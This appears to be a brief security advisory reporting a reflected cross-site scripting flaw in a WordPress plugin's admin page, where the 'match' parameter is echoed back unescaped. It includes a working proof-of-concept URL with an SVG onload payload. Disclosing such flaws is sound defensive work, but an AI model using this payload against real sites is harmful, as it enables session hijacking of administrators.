The plugin does not sanitize and escape the match parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=ab-database-peek&table=wp_users&match="><svg onload=alert(/XSS/)>